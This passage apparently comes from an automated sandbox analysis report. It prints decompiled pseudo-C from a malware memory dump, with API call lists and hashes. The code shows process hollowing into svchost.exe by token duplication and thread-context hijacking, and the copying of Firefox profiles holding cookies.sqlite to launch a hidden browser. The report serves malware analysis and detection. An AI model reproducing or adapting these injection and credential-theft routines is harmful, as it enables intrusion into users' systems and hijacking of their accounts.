                                                                                    				intOrPtr* _t285;
                                                                                    				long _t286;
                                                                                    				signed int _t290;
                                                                                    				signed int _t292;
                                                                                    				void* _t294;
                                                                                    				signed int _t295;
                                                                                    				void* _t296;
                                                                                    				long _t299;
                                                                                    
                                                                                    				_t227 = __ecx;
                                                                                    				_t224 = __ebx;
                                                                                    				_t292 = (_t290 & 0xfffffff0) - 0x898;
                                                                                    				_t117 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t117 ^ _t292;
                                                                                    				_push(_t254);
                                                                                    				_v2140.lpReserved = __edx;
                                                                                    				_v2140.lpDesktop = __ecx;
                                                                                    				E04EDDAD0(_t254,  &(_v2140.dwX), 0, 0x48);
                                                                                    				_v2140.dwX = 0x48;
                                                                                    				_v2180.dwProcessId = 0xc;
                                                                                    				_v2180.hProcess = 0;
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				_v2188 = 0;
                                                                                    				asm("movaps [esp+0x3c], xmm0");
                                                                                    				_v2180.dwThreadId = 0;
                                                                                    				E04EDDAD0(_t254,  &_v2052, 0, 0x114);
                                                                                    				_t294 = _t292 + 0x18;
                                                                                    				_v2052.dwOSVersionInfoSize = 0x114;
                                                                                    				GetVersionExW( &_v2052);
                                                                                    				asm("sbb esi, esi");
                                                                                    				_t269 = 1;
                                                                                    				_v2192 = 1;
                                                                                    				_t125 = E04EC5C60(__ebx, _t254, 1);
                                                                                    				if(_t125 == 0) {
                                                                                    					_t125 = E04EC5D00(_t254, 1);
                                                                                    					_t299 = _t125;
                                                                                    				}
                                                                                    				if(_t299 != 0 && _t269 != 0) {
                                                                                    					_t212 = OpenProcess(0x1fffff, 0, _t125);
                                                                                    					_v2180.dwThreadId = _t212;
                                                                                    					if(_t212 != 0) {
                                                                                    						_t285 = GetProcAddress(LoadLibraryA("kernel32.dll"), "InitializeProcThreadAttributeList");
                                                                                    						_t266 = GetProcAddress(LoadLibraryA("kernel32.dll"), "UpdateProcThreadAttribute");
                                                                                    						if(_t266 != 0) {
                                                                                    							_t303 = _t285;
                                                                                    							if(_t285 != 0) {
                                                                                    								 *_t285(0, 1, 0,  &_v2180);
                                                                                    								_t219 = E04ED5785(_t227, _t285, _t303);
                                                                                    								_t294 = _t294 + 4;
                                                                                    								_v2204 = _t219;
                                                                                    								_t220 =  *_t285(_t219, 1, 0,  &_v2196, _v2196);
                                                                                    								_t286 = _v2220;
                                                                                    								if(_t220 == 0) {
                                                                                    									L10:
                                                                                    									E04ED573F(_t286);
                                                                                    									_t294 = _t294 + 4;
                                                                                    									__eflags = 0;
                                                                                    									_v2220 = 0;
                                                                                    								} else {
                                                                                    									_push(0);
									_push(0);
									_push(4);
									_push( &_v2200);
									_push(0x20000);
									_push(0);
									_push(_t286);
									if( *_t266() == 0) {
										goto L10;
									} else {
										_v2140.dwXSize.cb = _t286;
										_v2232 = 0x8000c;
									}
								}
							}
						}
						_t269 = _v2192;
					}
				}
				_t256 = 0;
				_t127 = GetSystemDirectoryW( &_v1052, 0x104);
				if( *((short*)(_t294 + 0x486 + _t127 * 2)) == 0x5c) {
					L15:
					wsprintfW( &_v532, L"%ssvchost.exe -k SystemNetworkService",  &_v1052);
					_t295 = _t294 + 0xc;
					if(_t269 == 0) {
						L43:
						_t257 = CreateProcessW(0,  &_v524, 0, 0, 0, _v2164, 0, 0,  &(_v2140.dwXSize),  &_v2156);
					} else {
						_v2180.dwThreadId = _t256;
						_v2140.lpReserved = _t256;
						_t232 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSEnumerateSessionsW");
						_v2180.hThread = _t256;
						_v2184 = _t232;
						while(1) {
							_push( &(_v2140.lpReserved));
							_push( &(_v2180.dwThreadId));
							_push(1);
							_push(0);
							_push(0);
							if( *_t232() == 0) {
								goto L43;
							}
							_t250 = _v2156.hProcess;
							_t160 = 0;
							_t274 = _v2188;
							if(_t250 == 0) {
								L24:
								_t161 = 0;
								if(_t250 != 0) {
									_t234 = _t274 + 8;
									while( *_t234 != 1) {
										_t161 = _t161 + 1;
										_t234 = _t234 + 0xc;
										if(_t161 < _t250) {
											continue;
										} else {
										}
										goto L30;
									}
									_t256 =  *(_t274 + (_t161 + _t161 * 2) * 4);
								}
							} else {
								_t235 = _t274 + 8;
								while( *_t235 != 0) {
									_t160 = _t160 + 1;
									_t235 = _t235 + 0xc;
									if(_t160 < _t250) {
										continue;
									} else {
										goto L24;
									}
									goto L30;
								}
								_t256 =  *(_t274 + (_t160 + _t160 * 2) * 4);
								__eflags = _t256;
								if(_t256 == 0) {
									goto L24;
								}
							}
							L30:
							_t163 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSFreeMemory");
							 *_t163(_v2188);
							if(_t256 != 0) {
								_v2156.hProcess = _t256;
								_v2200 = 0;
								_v2208 = 0;
								_t166 = OpenProcessToken(GetCurrentProcess(), 0xb,  &_v2200);
								__eflags = _t166;
								if(_t166 != 0) {
									_t173 = DuplicateTokenEx(_v2200, 0x2000000, 0, 0, 1,  &_v2208);
									__eflags = _t173;
									if(_t173 != 0) {
										_t175 = E04ECAA20();
										__eflags = _t175;
										if(_t175 == 0) {
											CloseHandle(_v2216);
											_v2216 = 0;
										} else {
											_t178 = SetTokenInformation(_v2216, 0xc,  &_v2164, 4);
											__eflags = _t178;
											if(_t178 == 0) {
												CloseHandle(_v2220);
												_v2220 = 0;
											}
										}
									}
									CloseHandle(_v2208);
								}
								_t275 = _v2208;
								__eflags = _t275;
								if(_t275 == 0) {
									goto L43;
								} else {
									_t257 = CreateProcessAsUserW(_t275, 0,  &_v548, 0, 0, 0, _v2188, 0, 0,  &_v2140,  &_v2180);
									CloseHandle(_t275);
									__eflags = _t257;
									if(_t257 == 0) {
										goto L43;
									}
								}
							} else {
								Sleep(0xbb8);
								_t232 = _v2208;
								_t280 = _v2200 + 1;
								_v2200 = _t280;
								if(_t280 < 0xa) {
									continue;
								} else {
									goto L43;
								}
							}
							goto L44;
						}
						goto L43;
					}
					L44:
					_t270 = _v2180.hProcess;
					if(_t270 != 0) {
						_t152 = GetProcAddress(LoadLibraryA("kernel32.dll"), "DeleteProcThreadAttributeList");
						if(_t152 != 0) {
							 *_t152(_t270);
						}
						_push(1);
						E04ED5777(_t270);
						_t295 = _t295 + 8;
					}
					_t135 = _v2160;
					if(_t135 != 0) {
						CloseHandle(_t135);
					}
					if(_t257 == 0) {
						L54:
						return E04ED572E(_v0 ^ _t295);
					} else {
						_v1764.ContextFlags = 0x10007;
						if(GetThreadContext(_v2156.hThread,  &_v1764) == 0) {
							goto L54;
						} else {
							_t259 = _v2140.lpTitle;
							_t272 = VirtualAllocEx(_v2156.hProcess, 0, _t259, 0x3000, 0x40);
							if(_t272 != 0) {
								_t142 = WriteProcessMemory(_v2156.hProcess, _t272, _v2140.dwX, _t259,  &(_v2140.dwY));
								__eflags = _t142;
								if(_t142 == 0) {
									goto L53;
								} else {
									_v1764.Eip = _t272;
									_t145 = SetThreadContext(_v2156.hThread,  &_v1764);
									__eflags = _t145;
									if(_t145 == 0) {
										goto L53;
									} else {
										_t146 = ResumeThread(_v2156.hThread);
										__eflags = _t146 - 0xffffffff;
										if(_t146 == 0xffffffff) {
											goto L53;
										} else {
											CloseHandle(_v2156.hThread);
											__eflags = _v0 ^ _t295;
											return E04ED572E(_v0 ^ _t295);
										}
									}
								}
							} else {
								L53:
								TerminateProcess(_v2156, 0);
								goto L54;
							}
						}
					}
				} else {
					 *((short*)(_t294 + 0x488 + _t127 * 2)) = 0x5c;
					_t182 = 2 + _t127 * 2;
					if(_t182 >= 0x208) {
						E04ED5C09();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t296 = _t294 - 0x10;
						_push(_t224);
						_push(_t269);
						_push(0);
						_v2224 = 0;
						_v2228 = 0;
						E04EC9360(_t224,  &_v2232, 0, _t269, __eflags, L"Dispatch");
						__eflags = _v2232;
						_t261 = CloseHandle;
						if(_v2232 != 0) {
							L72:
							_t281 = 0;
							__eflags = 0;
						} else {
							__eflags = _v20;
							_t226 = WaitForSingleObject;
							if(__eflags == 0) {
								goto L77;
							} else {
								_t205 = E04EC94A0(WaitForSingleObject, L"Dispatch", CloseHandle, _t269, __eflags);
								__eflags = _t205;
								if(__eflags == 0) {
									goto L77;
								} else {
									while(1) {
										__eflags = _t205 - 0x2fffffff;
										if(_t205 == 0x2fffffff) {
											break;
										}
										__eflags = _t205 - 0x1fffffff;
										if(_t205 == 0x1fffffff) {
											break;
										} else {
											_t269 = OpenThread(0x1fffff, 0, _t205);
											__eflags = _t269;
											if(__eflags == 0) {
												goto L77;
											} else {
												WaitForSingleObject(_t269, 0xffffffff);
												__eflags = GetExitCodeThread(_t269,  &_v12);
												if(__eflags == 0) {
													L68:
													__eflags = E04EC9360(_t226,  &_v24, _t261, _t269, __eflags, L"Dispatch");
													if(__eflags != 0) {
														goto L77;
													} else {
														_t205 = E04EC94A0(_t226, L"Dispatch", _t261, _t269, __eflags);
														__eflags = _t205;
														if(__eflags != 0) {
															continue;
														} else {
															while(1) {
																L77:
																_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																__eflags = _t188;
																if(__eflags == 0) {
																}
																L78:
																_v12 = 0;
																_t191 = E04EC95F0(_t226,  &_v12, _t261, _t269, __eflags);
																_t263 = _t191;
																__eflags = _t191;
																if(__eflags == 0) {
																	L76:
																	_t261 = CloseHandle;
																} else {
																	_t251 = _v12;
																	__eflags = _v12;
																	if(__eflags == 0) {
																		goto L76;
																	} else {
																		_t269 = E04EC98E0(_t226, _t263, _t251,  &_v12);
																		E04ED573F(_t263);
																		_t261 = CloseHandle;
																		_t296 = _t296 + 8;
																		__eflags = _t269;
																		if(__eflags != 0) {
																			__eflags = WaitForSingleObject(_t269, 0xbb8) - 0x102;
																			if(__eflags == 0) {
																				CloseHandle(_t269);
																			}
																		}
																		while(1) {
																			L77:
																			_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																			__eflags = _t188;
																			if(__eflags == 0) {
																			}
																			goto L78;
																		}
																	}
																	while(1) {
																		L77:
																		_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																		__eflags = _t188;
																		if(__eflags == 0) {
																		}
																		goto L83;
																	}
																	goto L78;
																}
																continue;
																L83:
																__eflags = _t188 - 0x1fffffff;
																if(_t188 == 0x1fffffff) {
																	do {
																		_t189 = SetConsoleCtrlHandler(E04ECA880, 0);
																		__eflags = _t189;
																	} while (_t189 != 0);
																	_t281 = 0x315;
																} else {
																	__eflags = _t188 - 0x2fffffff;
																	if(__eflags != 0) {
																		_t269 = OpenThread(0x1fffff, 0, _t188);
																		__eflags = _t269;
																		if(__eflags == 0) {
																			goto L78;
																		} else {
																			WaitForSingleObject(_t269, 0xffffffff);
																			CloseHandle(_t269);
                                                                                    																		}
                                                                                    																		continue;
                                                                                    																	} else {
                                                                                    																		Sleep(0x7d0);
                                                                                    																		_v12 = 0;
                                                                                    																		_t198 = E04EC95F0(_t226,  &_v12, _t261, _t269, __eflags);
                                                                                    																		_t269 = _t198;
                                                                                    																		__eflags = _t198;
                                                                                    																		if(__eflags == 0) {
                                                                                    																			continue;
                                                                                    																		} else {
                                                                                    																			_t252 = _v12;
                                                                                    																			__eflags = _v12;
                                                                                    																			if(__eflags == 0) {
                                                                                    																				continue;
                                                                                    																			} else {
                                                                                    																				_t264 = E04EC98E0(_t226, _t269, _t252,  &_v12);
                                                                                    																				E04ED573F(_t269);
                                                                                    																				_t296 = _t296 + 8;
                                                                                    																				__eflags = _t264;
                                                                                    																				if(__eflags == 0) {
                                                                                    																					goto L76;
                                                                                    																				} else {
                                                                                    																					__eflags = WaitForSingleObject(_t264, 0xbb8) - 0x102;
                                                                                    																					if(__eflags != 0) {
                                                                                    																						goto L76;
                                                                                    																					} else {
                                                                                    																						CloseHandle(_t264);
                                                                                    																						E04EB78A0(_t226, L"Dispatch", 0x2fffffff, CloseHandle, _t269, __eflags);
                                                                                    																						do {
                                                                                    																							_t204 = SetConsoleCtrlHandler(E04ECA880, 0);
                                                                                    																							__eflags = _t204;
                                                                                    																						} while (_t204 != 0);
                                                                                    																						_t281 = 0x315;
                                                                                    																					}
                                                                                    																				}
                                                                                    																			}
                                                                                    																		}
                                                                                    																	}
                                                                                    																}
                                                                                    																goto L73;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												} else {
                                                                                    													__eflags = _v12 - 0x315;
                                                                                    													if(__eflags == 0) {
                                                                                    														goto L72;
                                                                                    													} else {
                                                                                    														goto L68;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    										goto L73;
                                                                                    									}
                                                                                    									E04ECA860();
                                                                                    									goto L72;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						L73:
                                                                                    						_t185 = _v16;
                                                                                    						__eflags = _t185;
                                                                                    						if(_t185 != 0) {
                                                                                    							CloseHandle(_t185);
                                                                                    						}
                                                                                    						return _t281;
                                                                                    					} else {
                                                                                    						 *((short*)(_t294 + _t182 + 0x488)) = 0;
                                                                                    						goto L15;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ec9dbc
                                                                                    0x04ec9dbd
                                                                                    0x04ec9dbe
                                                                                    0x04ec9dbf
                                                                                    0x04ec9dc3
                                                                                    0x04ec9dc6
                                                                                    0x04ec9dc7
                                                                                    0x04ec9dc8
                                                                                    0x04ec9dd1
                                                                                    0x04ec9dd8
                                                                                    0x04ec9ddf
                                                                                    0x04ec9de4
                                                                                    0x04ec9de8
                                                                                    0x04ec9dee
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9df4
                                                                                    0x04ec9df4
                                                                                    0x04ec9df8
                                                                                    0x04ec9dfe
                                                                                    0x00000000
                                                                                    0x04ec9e04
                                                                                    0x04ec9e09
                                                                                    0x04ec9e0e
                                                                                    0x04ec9e10
                                                                                    0x00000000
                                                                                    0x04ec9e16
                                                                                    0x04ec9e16
                                                                                    0x04ec9e16
                                                                                    0x04ec9e1b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e1d
                                                                                    0x04ec9e22
                                                                                    0x00000000
                                                                                    0x04ec9e24
                                                                                    0x04ec9e32
                                                                                    0x04ec9e34
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x04ec9e38
                                                                                    0x04ec9e3b
                                                                                    0x04ec9e48
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e55
                                                                                    0x04ec9e62
                                                                                    0x04ec9e64
                                                                                    0x00000000
                                                                                    0x04ec9e66
                                                                                    0x04ec9e6b
                                                                                    0x04ec9e70
                                                                                    0x04ec9e72
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x04ec9eae
                                                                                    0x04ec9eb1
                                                                                    0x04ec9eb8
                                                                                    0x04ec9ebd
                                                                                    0x04ec9ebf
                                                                                    0x04ec9ec1
                                                                                    0x04ec9e92
                                                                                    0x04ec9e92
                                                                                    0x04ec9ec3
                                                                                    0x04ec9ec3
                                                                                    0x04ec9ec6
                                                                                    0x04ec9ec8
                                                                                    0x00000000
                                                                                    0x04ec9eca
                                                                                    0x04ec9ed3
                                                                                    0x04ec9ed5
                                                                                    0x04ec9eda
                                                                                    0x04ec9ee0
                                                                                    0x04ec9ee3
                                                                                    0x04ec9ee5
                                                                                    0x04ec9eef
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9ea0
                                                                                    0x00000000
                                                                                    0x04ec9efb
                                                                                    0x04ec9efb
                                                                                    0x04ec9f00
                                                                                    0x04ec9fd2
                                                                                    0x04ec9fd9
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdf
                                                                                    0x04ec9f06
                                                                                    0x04ec9f06
                                                                                    0x04ec9f0b
                                                                                    0x04ec9fb5
                                                                                    0x04ec9fb7
                                                                                    0x04ec9fb9
                                                                                    0x00000000
                                                                                    0x04ec9fbf
                                                                                    0x04ec9fc2
                                                                                    0x04ec9fc5
                                                                                    0x04ec9fc5
                                                                                    0x00000000
                                                                                    0x04ec9f11
                                                                                    0x04ec9f16
                                                                                    0x04ec9f1f
                                                                                    0x04ec9f26
                                                                                    0x04ec9f2b
                                                                                    0x04ec9f2d
                                                                                    0x04ec9f2f
                                                                                    0x00000000
                                                                                    0x04ec9f35
                                                                                    0x04ec9f35
                                                                                    0x04ec9f38
                                                                                    0x04ec9f3a
                                                                                    0x00000000
                                                                                    0x04ec9f40
                                                                                    0x04ec9f49
                                                                                    0x04ec9f4b
                                                                                    0x04ec9f50
                                                                                    0x04ec9f53
                                                                                    0x04ec9f55
                                                                                    0x00000000
                                                                                    0x04ec9f5b
                                                                                    0x04ec9f63
                                                                                    0x04ec9f68
                                                                                    0x00000000
                                                                                    0x04ec9f6e
                                                                                    0x04ec9f75
                                                                                    0x04ec9f81
                                                                                    0x04ec9f90
                                                                                    0x04ec9f97
                                                                                    0x04ec9f99
                                                                                    0x04ec9f99
                                                                                    0x04ec9f9d
                                                                                    0x04ec9f9d
                                                                                    0x04ec9f68
                                                                                    0x04ec9f55
                                                                                    0x04ec9f3a
                                                                                    0x04ec9f2f
                                                                                    0x04ec9f0b
                                                                                    0x00000000
                                                                                    0x04ec9f00
                                                                                    0x04ec9ea0
                                                                                    0x04ec9e72
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e53
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x04ec9e22
                                                                                    0x04ec9e76
                                                                                    0x00000000
                                                                                    0x04ec9e76
                                                                                    0x04ec9e10
                                                                                    0x04ec9dfe
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e80
                                                                                    0x04ec9e82
                                                                                    0x04ec9e85
                                                                                    0x04ec9e85
                                                                                    0x04ec9e8f
                                                                                    0x04ec9a9a
                                                                                    0x04ec9a9c
                                                                                    0x00000000
                                                                                    0x04ec9a9c
                                                                                    0x04ec9a94

APIs
• GetVersionExW.KERNEL32(00000114), ref: 04EC9968
  • Part of subcall function 04EC5C60: GetCurrentProcessId.KERNEL32(?,74E04DC0), ref: 04EC5C75
  • Part of subcall function 04EC5C60: CreateToolhelp32Snapshot.KERNEL32 ref: 04EC5C8B
  • Part of subcall function 04EC5C60: Process32FirstW.KERNEL32(00000000,0000022C), ref: 04EC5CA5
  • Part of subcall function 04EC5C60: Process32NextW.KERNEL32(00000000,0000022C), ref: 04EC5CC6
  • Part of subcall function 04EC5C60: FindCloseChangeNotification.KERNEL32(00000000), ref: 04EC5CDC
• OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 04EC99A9
• LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList), ref: 04EC99C5
• GetProcAddress.KERNEL32(00000000), ref: 04EC99CC
• LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute), ref: 04EC99DA
• GetProcAddress.KERNEL32(00000000), ref: 04EC99E1
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC9A6A
• wsprintfW.USER32 ref: 04EC9AB9
• LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSEnumerateSessionsW,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9ADC
• GetProcAddress.KERNEL32(00000000), ref: 04EC9AE3
  • Part of subcall function 04EC5D00: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D18
  • Part of subcall function 04EC5D00: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D25
• LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSFreeMemory,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9B61
• GetProcAddress.KERNEL32(00000000), ref: 04EC9B68
• Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9B7D
• GetCurrentProcess.KERNEL32 ref: 04EC9BB2
• OpenProcessToken.ADVAPI32(00000000,0000000B,00000000), ref: 04EC9BC0
• DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000), ref: 04EC9BDE
• SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 04EC9BFE
• CloseHandle.KERNEL32(00000000), ref: 04EC9C12
• CloseHandle.KERNEL32(00000000), ref: 04EC9C28
• CloseHandle.KERNEL32(00000000), ref: 04EC9C3E
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 04EC9C6B
• CloseHandle.KERNEL32(00000000), ref: 04EC9C74
• CreateProcessW.KERNEL32 ref: 04EC9CA0
• LoadLibraryA.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9CBA
• GetProcAddress.KERNEL32(00000000), ref: 04EC9CC1
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9CE2
• GetThreadContext.KERNEL32(?,?), ref: 04EC9D03
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 04EC9D1F
• TerminateProcess.KERNEL32(?,00000000), ref: 04EC9D31
• WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 04EC9D5C
• SetThreadContext.KERNEL32(?,00010007), ref: 04EC9D79
• ResumeThread.KERNEL32(?), ref: 04EC9D87
• CloseHandle.KERNEL32(?), ref: 04EC9D96
• OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch,00000000,00000001,74E5F750), ref: 04EC9E2C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9E3B
• GetExitCodeThread.KERNEL32(00000000,?), ref: 04EC9E42
• CloseHandle.KERNEL32(00000000,Dispatch), ref: 04EC9E85
• WaitForSingleObject.KERNEL32(00000000,00000BB8,00000001,74E5F750), ref: 04EC9EED
• CloseHandle.KERNEL32(00000000), ref: 04EC9EF7
  • Part of subcall function 04ECA860: SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000,00000001,04EC9E7B,Dispatch,00000000,00000001,74E5F750), ref: 04ECA86E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Process$Close$Handle$AddressLibraryLoadProcThread$Open$CreateCurrentToken$ContextObjectProcess32SingleWait$AllocChangeCodeConsoleCtrlDirectoryDuplicateExitFindFirstHandlerInformationMemoryNextNotificationResumeSleepSnapshotSystemTerminateToolhelp32UserVersionVirtualWritewsprintf
• String ID: %ssvchost.exe -k SystemNetworkService$Control$DeleteProcThreadAttributeList$Dispatch$H$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$\$kernel32.dll
• API String ID: 2302521369-2611280217
• Opcode ID: 9c78712a980e65aa64574015d935efededb2323b4c93034a028fa36a2fa410ff
• Instruction ID: 98fc06f56861d5c6b194b477152e4190cf8a15d9f1af4e11d403a22bac71f0f0
• Opcode Fuzzy Hash: 9c78712a980e65aa64574015d935efededb2323b4c93034a028fa36a2fa410ff
• Instruction Fuzzy Hash: 25F1DFB1604300EBE720DB65CD05FABBBE9EF84B09F14191DF945A6190EB74E906CB92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
                                                                                    			E04EB6A30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v12;
                                                                                    				short _v536;
                                                                                    				short _v1056;
                                                                                    				short _v1576;
                                                                                    				short _v2096;
                                                                                    				struct _WIN32_FIND_DATAW _v2688;
                                                                                    				char _v2692;
                                                                                    				intOrPtr _v2696;
                                                                                    				char _v2712;
                                                                                    				signed int _t34;
                                                                                    				int _t60;
                                                                                    				intOrPtr _t76;
                                                                                    				void* _t77;
                                                                                    				void* _t89;
                                                                                    				void* _t91;
                                                                                    				signed int _t92;
                                                                                    				void* _t93;
                                                                                    				void* _t94;
                                                                                    
                                                                                    				_t34 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t34 ^ _t92;
                                                                                    				_t76 = __ecx;
                                                                                    				_v2692 = 0x104;
                                                                                    				_v2696 = __ecx;
                                                                                    				_t79 =  &_v536;
                                                                                    				if(E04EC7200( &_v536,  &_v2692, __eflags) == 0) {
                                                                                    					__eflags = _v12 ^ _t92;
                                                                                    					return E04ED572E(_v12 ^ _t92);
                                                                                    				} else {
                                                                                    					lstrcatW( &_v536, L"\\AppData\\Roaming\\Mozilla\\Firefox");
                                                                                    					_t77 = wsprintfW;
                                                                                    					wsprintfW( &_v1576, L"%s\\%s",  &_v536,  *((intOrPtr*)(_t76 + 0x70)));
                                                                                    					wsprintfW( &_v2096, L"%s%s",  &_v536, L"\\Profiles\\*.*");
                                                                                    					_t94 = _t93 + 0x20;
                                                                                    					_t89 = FindFirstFileW( &_v2096,  &_v2688);
                                                                                    					if(_t89 != 0xffffffff) {
                                                                                    						_t91 = lstrcmpW;
                                                                                    						do {
                                                                                    							if(lstrcmpW( &(_v2688.cFileName), ".") == 0 || lstrcmpW( &(_v2688.cFileName), L"..") == 0) {
                                                                                    								goto L6;
                                                                                    							} else {
                                                                                    								wsprintfW( &_v1056, L"%s\\Profiles\\%s\\cookies.sqlite",  &_v536,  &(_v2688.cFileName));
                                                                                    								_t94 = _t94 + 0x10;
                                                                                    								if(PathFileExistsW( &_v1056) != 0) {
                                                                                    									wsprintfW( &_v1056, L"%s\\Profiles\\%s",  &_v536,  &(_v2688.cFileName));
                                                                                    									_t94 = _t94 + 0x10;
                                                                                    									_t79 =  &_v1056;
                                                                                    									E04EC7390(_t77,  &_v1056,  &_v1576, _t89, _t91);
                                                                                    								} else {
                                                                                    									goto L6;
                                                                                    								}
                                                                                    							}
                                                                                    							L9:
                                                                                    							FindClose(_t89);
                                                                                    							goto L10;
                                                                                    							L6:
                                                                                    							_t60 = FindNextFileW(_t89,  &_v2688);
                                                                                    							_t104 = _t60;
                                                                                    						} while (_t60 != 0);
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					L10:
                                                                                    					wsprintfW( &_v536, L"cmd.exe /c start firefox.exe -no-remote -profile \"%s\"",  &_v1576);
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					asm("movups [ebp-0xa94], xmm0");
                                                                                    					_push( &_v2712);
                                                                                    					_push( &_v536);
                                                                                    					E04EC72A0(_t77,  *((intOrPtr*)(_v2696 + 0x70)), _t104);
                                                                                    					return E04ED572E(_v12 ^ _t92, _t79);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Roaming\Mozilla\Firefox), ref: 04EB6A7D
                                                                                    • wsprintfW.USER32 ref: 04EB6A9F
                                                                                    • wsprintfW.USER32 ref: 04EB6AB9
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB6ACC
                                                                                    • lstrcmpW.KERNEL32(?,04EFC940), ref: 04EB6AEF
                                                                                    • lstrcmpW.KERNEL32(?,04EFC944), ref: 04EB6B01
                                                                                    • wsprintfW.USER32 ref: 04EB6B21
                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 04EB6B2D
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 04EB6B3F
                                                                                    • wsprintfW.USER32 ref: 04EB6B65
                                                                                    • FindClose.KERNEL32(00000000), ref: 04EB6B7C
                                                                                    • wsprintfW.USER32 ref: 04EB6B95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$FileFind$Closelstrcmp$AddressDirectoryExistsFirstHandleLibraryLoadNextPathProcProfileUserlstrcat
